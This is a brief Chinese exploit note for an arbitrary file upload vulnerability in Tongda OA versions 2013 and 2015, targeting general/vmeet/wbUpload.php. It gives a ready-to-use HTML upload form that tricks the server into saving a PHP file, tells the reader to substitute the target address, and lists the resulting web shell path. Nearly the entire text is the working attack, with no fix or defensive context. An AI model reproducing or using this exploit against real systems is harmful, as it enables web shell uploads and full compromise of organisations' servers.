通达OA 任意文件上传-2013/2015版本

参考

http://wiki.0-sec.org/0day/%E9%80%9A%E8%BE%BEoa/11.html

影响版本

2013版本

2015版本

漏洞文件

general/vmeet/wbUpload.php

exp     修改标记的为目标地址

<form enctype="multipart/form-data" action="http://0-sec.org/general/vmeet/wbUpload.php
?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>

上传jpg之后shell地址为

http://0-sec.org/general/vmeet/wbUpload/test.php

原文地址:https://www.cnblogs.com/null1433/p/12767915.html